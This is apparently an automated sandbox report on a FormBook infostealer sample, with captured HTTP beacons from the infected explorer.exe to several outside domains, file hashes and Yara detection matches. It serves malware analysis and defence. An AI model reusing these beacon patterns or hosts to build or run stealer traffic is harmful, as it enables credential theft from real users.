6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 73 6f 6c 69 64 20 31 70 78 20 23 33 61 33 61 33 61 3b 0a 20 20 7d 0a 0a 20 20 62 6f 64 79 20 7b 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 20 22 43 6c 61 72 6b 73 6f 6e 22 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 32 70 78 3b 0a 20 20 7d 0a 0a 20 20 23 73 74 61 74 75 73 2d 70 61 67 65 20 7b 0a 20 20 20 20 64 69 73 70 6c 61 79 3a 20 6e 6f 6e 65 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 7b 0a 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 61 62 73 6f 6c 75 74 65 3b 0a 20 20 20 20 62 6f 74 74 6f 6d 3a 20 32 32 70 78 3b 0a 20 20 20 20 6c 65 66 74 3a 20 30 3b 0a 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0a 20 20 20 20 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 65 6d 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20 7b 0a 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 20 31 31 70 78 3b 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 65 6d 3b 0a 20 20 20 20
                                                                          Data Ascii: <!DOCTYPE html><head> <title>400 Bad Request</title> <meta name="viewport" content="width=device-width, initial-scale=1"> <style type="text/css"> body { background: white; } main { position: absolute; top: 50%; left: 50%; transform: translate(-50%, -50%); text-align: center; min-width: 95vw; } main h1 { font-weight: 300; font-size: 4.6em; color: #191919; margin: 0 0 11px 0; } main p { font-size: 1.4em; color: #3a3a3a; font-weight: 300; line-height: 2em; margin: 0; } main p a { color: #3a3a3a; text-decoration: none; border-bottom: solid 1px #3a3a3a; } body { font-family: "Clarkson", sans-serif; font-size: 12px; } #status-page { display: none; } footer { position: absolute; bottom: 22px; left: 0; width: 100%; text-align: center; line-height: 2em; } footer span { margin: 0 11px; font-size: 1em;
                                                                          Apr 29, 2021 07:56:26.217288017 CEST1384INData Raw: 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 33 30 30 3b 0a 20 20 20 20 63 6f 6c 6f 72 3a 20 23 61 39 61 39 61 39 3b 0a 20 20 20 20 77 68 69 74 65 2d 73 70 61 63 65 3a 20 6e 6f 77 72 61 70 3b 0a 20 20 7d 0a 0a 20 20 66 6f 6f 74 65 72 20 73 70 61 6e 20
                                                                          Data Ascii: font-weight: 300; color: #a9a9a9; white-space: nowrap; } footer span strong { font-weight: 300; color: #191919; } @media (max-width: 600px) { body { font-size: 10px; } } @font-face { font-family
                                                                          Apr 29, 2021 07:56:26.217303991 CEST1385INData Raw: 5a 63 36 54 67 4b 77 31 43 5a 4c 45 58 79 47 5a 76 49 55 6a 4a 54 46 4c 57 58 69 45 6a 6b 6a 50 2f 45 62 4e 73 72 37 4a 58 55 39 6b 62 54 57 76 76 4e 49 74 64 68 59 66 30 56 70 6a 56 43 35 78 36 41 57 48 30 43 6f 70 4a 39 6b 4c 4c 32 46 4d 6f 34
                                                                          Data Ascii: Zc6TgKw1CZLEXyGZvIUjJTFLWXiEjkjP/EbNsr7JXU9kbTWvvNItdhYf0VpjVC5x6AWH0CopJ9kLL2FMo41uoZFFIwX0vyHuEjHYH2VmrxOkqFo0adgxDecFou4ep9oyEd/DYGc3ZB+z+7LZeRzLqapLukxRFwknNZLe1mD3UUryptN0i8agj3nXEkMT3jM6TFgFmSPui9ANP5tgumW+7GL2HT49v6T21zEFSmU/PyRmlIHkbMt
                                                                          Apr 29, 2021 07:56:26.217317104 CEST1386INData Raw: 41 62 54 6a 45 6d 75 66 55 51 6f 51 67 41 37 52 69 72 39 61 39 68 5a 78 71 47 69 48 63 52 46 7a 33 71 43 59 53 35 6f 69 36 56 6e 58 56 63 2b 31 6a 6f 48 35 33 57 4c 6c 77 6a 39 5a 58 78 72 33 37 75 63 66 65 38 35 4b 59 62 53 5a 45 6e 4e 50 71 75
                                                                          Data Ascii: AbTjEmufUQoQgA7Rir9a9hZxqGiHcRFz3qCYS5oi6VnXVc+1joH53WLlwj9ZXxr37ucfe85KYbSZEnNPquYQLdZGuGjum67O6vs4pznNN15fYXFdOLuLWXrsKEmCQSfZo21npOsch0vJ4uwm8gxs1rVFd7xXNcYLdHOA8u6Q+yN/ryi71Hun8adEPitdau1oRoJdRdmo7vWKu+0nK470m8D6uPnOKeCe7xMpwlB3s5Szbpd7HP+
                                                                          Apr 29, 2021 07:56:26.217333078 CEST1387INData Raw: 64 57 72 56 38 34 7a 76 71 7a 55 70 39 38 37 66 66 4f 71 71 2b 70 6a 34 6c 4d 59 63 71 2b 5a 58 75 5a 73 78 54 49 4d 35 5a 7a 6e 4f 75 49 56 7a 61 6e 45 38 43 58 6a 4f 52 4a 38 38 35 36 67 57 65 63 49 73 37 33 47 34 49 56 61 54 6f 6d 2b 46 64 5a
                                                                          Data Ascii: dWrV84zvqzUp987ffOqq+pj4lMYcq+ZXuZsxTIM5ZznOuIVzanE8CXjORJ8856gWecIs73G4IVaTom+FdZmk13iQhZpVvwWaeJJvZwmZfgLrMEPDsmWSeTP2pgBIVqr44ljnDOc42NDfmKJscRnzjslLu8YD7DeUiQta8q+gTM8UuJgxqs1ltlxGmF3mHRe8w7M6YKbpYWBIZw6abAXoINXCHv8WIYdhau8bWC2V991qxUKLIeS
                                                                          Apr 29, 2021 07:56:26.217351913 CEST1388INData Raw: 73 55 74 73 78 4c 45 35 68 38 53 70 70 4e 4d 66 78 35 69 6a 57 48 70 62 33 6d 5a 31 45 36 68 46 5a 43 4f 74 4a 6d 38 39 4a 38 42 6e 78 37 48 39 43 4d 66 7a 59 41 58 4d 37 66 6d 78 47 73 68 77 4c 6a 56 68 6f 78 30 49 4c 46 71 72 77 35 2b 64 6f 7a
                                                                          Data Ascii: sUtsxLE5h8SppNMfx5ijWHpb3mZ1E6hFZCOtJm89J8Bnx7H9CMfzYAXM7fmxGshwLjVhox0ILFqrw5+doz1Kt5lGsvahyjMuRVHINKIASaMX6Aaz/zP39dVJaibMTznE8XEmMq8H7zHPYm8ZeF/aKMDTB0O12KY6trbCV4ekxPC26HLAH2M1LTSQ0hyP1ROTBMgNLCwxVMHS4fHg2e2RNqvGnJI340EzbSTZWms3Y345WE1qeFI
                                                                          Apr 29, 2021 07:56:26.217379093 CEST1390INData Raw: 6a 66 69 63 35 33 53 6e 75 34 72 53 74 2b 48 74 59 6a 2b 4a 76 41 47 4a 49 64 55 67 7a 75 6b 70 63 44 65 4a 72 47 31 62 6d 34 57 73 62 6c 75 59 78 4f 77 31 62 47 7a 77 4c 30 44 74 4c 41 71 42 6c 41 74 30 35 36 4c 61 6a 65 7a 71 36 48 72 5a 50 77
                                                                          Data Ascii: jfic53Snu4rSt+HtYj+JvAGJIdUgzukpcDeJrG1bm4WsbluYxOw1bGzwL0DtLAqBlAt056Lajezq6HrZPw/M09kfgGcfzBOwryRaVDs6DJQcm6Z8PXsbsd4goAUYk4XLU6HLUiC2fVyfFCeYUc9OUuGlK7uaNENPDxPKgKHrPYD2KRgA0Jz1pdYiVah3ihI8SsbuZ7Qut7FtdT28OepdJALQ9kcuIqJaIlksKpGWQaBJEs5Ro2u
                                                                          Apr 29, 2021 07:56:26.217412949 CEST1391INData Raw: 49 73 56 6e 48 51 76 47 66 48 4a 59 2b 47 73 46 4f 76 65 49 61 4c 6b 5a 54 6f 6d 2b 43 35 70 6e 6e 30 5a 74 5a 4f 73 63 53 62 64 54 51 5a 49 5a 49 6a 7a 4e 47 71 33 6a 5a 65 59 56 58 71 62 44 42 4b 37 7a 4f 50 76 37 4e 6d 78 7a 6d 4d 43 6f 36 79
                                                                          Data Ascii: IsVnHQvGfHJY+GsFOveIaLkZTom+C5pnn0ZtZOscSbdTQZIZIjzNGq3jZeYVXqbDBK7zOPv7NmxzmMCo6yxGOpqJLxQEPP8ebkh2xjxPso8Vpyed4bWtGDod5nbfYx2tE9IjIcwqDOQxCLgjqhrjJapxQj5aykZ/KjJyp8vYw2jOkioWHg6QaitbobouivfRYdGlwB0//RiIvIqLJ/al9rsfi5oavS3VijivkmceYKJ2jlOzsy3
                                                                          Apr 29, 2021 07:56:26.217431068 CEST1392INData Raw: 62 61 4b 64 68 59 6b 30 71 76 4f 51 56 49 71 79 6b 70 38 72 73 6c 57 4b 4b 62 77 45 6d 55 72 39 49 52 64 38 6c 67 73 49 66 2b 75 77 66 68 39 72 73 6a 2f 2f 30 34 7a 38 50 49 39 68 69 6d 33 61 35 51 30 68 41 67 43 76 57 73 45 6c 37 48 4c 47 6b 53
                                                                          Data Ascii: baKdhYk0qvOQVIqykp8rslWKKbwEmUr9IRd8lgsIf+uwfh9rsj//04z8PI9him3a5Q0hAgCvWsEl7HLGkSm8xy74a7RIq2RyhLLq4vENxWg6Z8OdDn9k/pO8nvZ82B9HQH4suep5bgnoW/t4r+OSsr3KDZZ7hjnjRmpSwWGJ1Rz24Sgbupfrusw+nYg9brZp6vKv2bXV9yNo3FwRf1UmbhULadGRmefHVN7jCO1g05Yzd4bBIOY
                                                                          Apr 29, 2021 07:56:26.217447996 CEST1394INData Raw: 50 33 55 43 44 61 59 67 2f 34 41 2f 4a 38 2b 65 6d 71 41 74 30 47 53 57 39 51 6d 2b 6b 37 6b 35 75 59 62 72 75 30 61 4e 30 4a 59 59 52 78 4a 2b 54 49 52 2b 6e 4c 46 4d 64 4f 39 39 63 4f 75 69 69 68 38 46 49 79 73 53 4d 78 4b 7a 59 77 45 59 32 73
                                                                          Data Ascii: P3UCDaYg/4A/J8+emqAt0GSW9Qm+k7k5uYbru0aN0JYYRxJ+TIR+nLFMdO99cOuiih8FIysSMxKzYwEY2sYWtbOMEdrKbPexlHwd4Hi/ghbyIF/MSXuoOf52DHIoeT/J0/wJ3SqRpQnpexxt4N+/hvbyP9ztH3+MHTs4d3Mnd3MuDPMpjQmmVVVe7pmpu5KHLiejRfHs+PruYnKemd+nbnlzBbpT+/sSSBYiT///ekfH78UPEBW
                                                                          Apr 29, 2021 07:56:26.349875927 CEST1396INData Raw: 39 79 46 49 39 70 49 64 59 71 59 66 31 4d 41 4e 36 52 49 2b 77 53 49 2f 71 55 5a 5a 48 77 6a 6f 6a 59 54 73 6a 59 66 6d 34 36 56 4d 69 5a 79 64 45 7a 72 5a 48 7a 71 5a 46 7a 72 5a 46 7a 6e 5a 45 7a 72 4b 52 73 33 7a 6b 72 44 74 79 6c 6f 75 63 37
                                                                          Data Ascii: 9yFI9pIdYqYf1MAN6RI+wSI/qUZZHwjojYTsjYfm46VMiZydEzrZHzqZFzrZFznZEzrKRs3zkrDtylouc7Y6c5SNn2chZLr75MySMUDeDNMxk2kyDdtPEJJOKxLSMvRjTTD7cnRbuTgp3m8OV6eHKjHBlZrgyK1yZHa7MCVfmhivzwpWOcKUzXOkKV7rDlZ5wpTdc6QtX+sOVgfBjOPwohx9Tw4/28CMXfmTCj9bwoxZ+JOFHMf


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          3192.168.2.349732198.71.232.380C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:31.448164940 CEST1435OUTGET /hw6d/?wR9=AAdYqRCZdpBCICVD7XT/TJuWXv5e4p9OLjsTJuFeeFMT5Erf7T6eOfQLuJbJMdHcFc0O&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.sueshemp.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:31.582693100 CEST1435INHTTP/1.1 400 Bad Request
                                                                          Connection: close


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          4192.168.2.349736154.216.244.23280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:37.125186920 CEST1492OUTGET /hw6d/?wR9=qHgMXp9xjKSDLOSO1Rlwgbov7xJRe3AlLaObeu+vQaN20mncnLVgIjt7WgvbzUpJv8vJ&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.onjulitrading.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:37.425286055 CEST1492INHTTP/1.1 200 OK
                                                                          Server: nginx
                                                                          Date: Thu, 29 Apr 2021 05:56:37 GMT
                                                                          Content-Type: text/html; charset=UTF-8
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Vary: Accept-Encoding
                                                                          Data Raw: 31 0d 0a 2e 0d 0a 30 0d 0a 0d 0a
                                                                          Data Ascii: 1.0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          5192.168.2.349742198.251.84.9280C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:42.608278036 CEST5076OUTGET /hw6d/?wR9=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzVIhNMaY+qFM&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.rechnung.pro
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:42.671952009 CEST5076INHTTP/1.1 302 Moved Temporarily
                                                                          Server: nginx
                                                                          Date: Thu, 29 Apr 2021 05:56:42 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 154
                                                                          Connection: close
                                                                          Location: http://www.rechnung.pro?wR9=Ddm3qJHqgzBdBhAnftzkfa9VwSzTwTX1J1BudaGH8hBPcPYq/VmKmGqlzVIhNMaY+qFM&3f=ZlLd8r8PtX
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 32 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>302 Found</title></head><body bgcolor="white"><center><h1>302 Found</h1></center><hr><center>nginx</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          6192.168.2.34974334.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:47.791250944 CEST5078OUTGET /hw6d/?wR9=NqDP1kNWGB45muwCVyMdlJqLatp7PevtuQ88HQHRMDyTbQkj9J6FuQuiyA3H8+Oo5z8S&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.conegenie.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:47.928129911 CEST5078INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 29 Apr 2021 05:56:47 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6089be8c-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          7192.168.2.349744216.239.38.2180C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:56:58.105643988 CEST5079OUTGET /hw6d/?wR9=QbKX2W928fHcAtFGRb4REkUMiu4SoEjkfForEbaW1QS7nBKCPnGWTt7TK177yyq4Tjq5&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.thelocallawnmen.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:56:58.186125994 CEST5081INHTTP/1.1 404 Not Found
                                                                          Content-Type: text/html; charset=utf-8
                                                                          Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                          Pragma: no-cache
                                                                          Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                          Date: Thu, 29 Apr 2021 05:56:58 GMT
                                                                          P3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."
                                                                          Report-To: {"group":"GeoMerchantPrestoSiteUi","max_age":2592000,"endpoints":[{"url":"https://csp.withgoogle.com/csp/report-to/GeoMerchantPrestoSiteUi/external"}]}
                                                                          Cross-Origin-Resource-Policy: cross-origin
                                                                          Cross-Origin-Opener-Policy-Report-Only: same-origin-allow-popups; report-to="GeoMerchantPrestoSiteUi"
                                                                          Content-Security-Policy: script-src 'report-sample' 'nonce-yKjbPO9cW/r8JFbtNMEfag' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/GeoMerchantPrestoSiteUi/cspreport;worker-src 'self'
                                                                          Server: ESF
                                                                          X-XSS-Protection: 0
                                                                          X-Content-Type-Options: nosniff
                                                                          Set-Cookie: NID=214=SOvaASTHxw7U1fTR9rJ3TgpN6uoP22uaitiapyy700A-c0PNUvBgcy4IsPZBXRqyCotXMbgYjEVXHhDNisdmEIgsA3gZ7yHtdHfRo1dXVU3TJ01bi7dFCCk-qslNYyy0wosmA_MyPKuECW_5TiXV6QvH7yBIhotQ-xEF5pPHxCo; expires=Fri, 29-Oct-2021 05:56:58 GMT; path=/; domain=.google.com; HttpOnly
                                                                          Accept-Ranges: none
                                                                          Vary: Accept-Encoding
                                                                          Transfer-Encoding: chunked
                                                                          Connection: close
                                                                          Data Raw: 36 35 33 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74
                                                                          Data Ascii: 653<html lang=en><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, widt
                                                                          Apr 29, 2021 07:56:58.186153889 CEST5082INData Raw: 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 79 4b 6a 62 50 4f 39 63 57 2f 72 38 4a
                                                                          Data Ascii: h=device-width"><title>Error 404 (Not Found)!!1</title><style nonce="yKjbPO9cW/r8JFbtNMEfag">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7%
                                                                          Apr 29, 2021 07:56:58.186162949 CEST5082INData Raw: 63 6f 6d 3e 3c 73 70 61 6e 20 69 64 3d 6c 6f 67 6f 20 61 72 69 61 2d 6c 61 62 65 6c 3d 47 6f 6f 67 6c 65 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72
                                                                          Data Ascii: com><span id=logo aria-label=Google></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></div>
                                                                          Apr 29, 2021 07:56:58.186239958 CEST5082INData Raw: 30 0d 0a 0d 0a
                                                                          Data Ascii: 0


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          8192.168.2.349745185.178.208.16080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:57:03.372229099 CEST5083OUTGET /hw6d/?wR9=YjpOOYUDmjvdyafLH2XIreLzwhI/7xCnoo7q/I/3CP849+jnPV3O3CrzxJL1042huvEP&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.lboclkchain.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:57:03.484061003 CEST5084INHTTP/1.1 404 Not Found
                                                                          Server: ddos-guard
                                                                          Connection: close
                                                                          Set-Cookie: __ddg1=1wxOFZrR49c7kxzfH0qh; Domain=.lboclkchain.com; HttpOnly; Path=/; Expires=Fri, 29-Apr-2022 05:57:03 GMT
                                                                          Date: Thu, 29 Apr 2021 05:57:03 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 178
                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                          Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html>


                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                          9192.168.2.34974834.102.136.18080C:\Windows\explorer.exe
                                                                          TimestampkBytes transferredDirectionData
                                                                          Apr 29, 2021 07:57:13.898264885 CEST5103OUTGET /hw6d/?wR9=dUGVTn/5aJJKliywqMmmpRKN90QgELEtjSlSK2PFHkAeyTnfmB2J+703q8XbnRj4tTIF&3f=ZlLd8r8PtX HTTP/1.1
                                                                          Host: www.sofiascelebrations.com
                                                                          Connection: close
                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                          Data Ascii:
                                                                          Apr 29, 2021 07:57:14.035387039 CEST5103INHTTP/1.1 403 Forbidden
                                                                          Server: openresty
                                                                          Date: Thu, 29 Apr 2021 05:57:13 GMT
                                                                          Content-Type: text/html
                                                                          Content-Length: 275
                                                                          ETag: "6089be8c-113"
                                                                          Via: 1.1 google
                                                                          Connection: close
                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                          Code Manipulations

                                                                          Statistics

                                                                          CPU Usage

                                                                          Click to jump to process

                                                                          Memory Usage

                                                                          Click to jump to process

                                                                          High Level Behavior Distribution

                                                                          Click to dive into process behavior distribution

                                                                          Behavior

                                                                          Click to jump to process

                                                                          System Behavior

                                                                          Analysis Process: PO_29_00412.exe PID: 5760 Parent PID: 5656

                                                                          General

                                                                          Start time:07:55:09
                                                                          Start date:29/04/2021
                                                                          Path:C:\Users\user\Desktop\PO_29_00412.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\PO_29_00412.exe'
                                                                          Imagebase:0x400000
                                                                          File size:212081 bytes
                                                                          MD5 hash:E4AD95F61666B540024FF22A60816843
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.225535038.0000000003120000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          Reputation:low

                                                                          Chronological Activities

                                                                          Analysis Process: PO_29_00412.exe PID: 5980 Parent PID: 5760

                                                                          General

                                                                          Start time:07:55:10
                                                                          Start date:29/04/2021
                                                                          Path:C:\Users\user\Desktop\PO_29_00412.exe
                                                                          Wow64 process (32bit):true
                                                                          Commandline:'C:\Users\user\Desktop\PO_29_00412.exe'
                                                                          Imagebase:0x400000
                                                                          File size:212081 bytes
                                                                          MD5 hash:E4AD95F61666B540024FF22A60816843
                                                                          Has elevated privileges:true
                                                                          Has administrator privileges:true
                                                                          Programmed in:C, C++ or other language
                                                                          Yara matches:
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261451958.0000000000900000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, Author: Joe Security
                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000001.00000002.261351613.00000000005B0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000001.00000001.221080798.0000000000400000.00000040.00020000.sdmp, Author: Joe Security
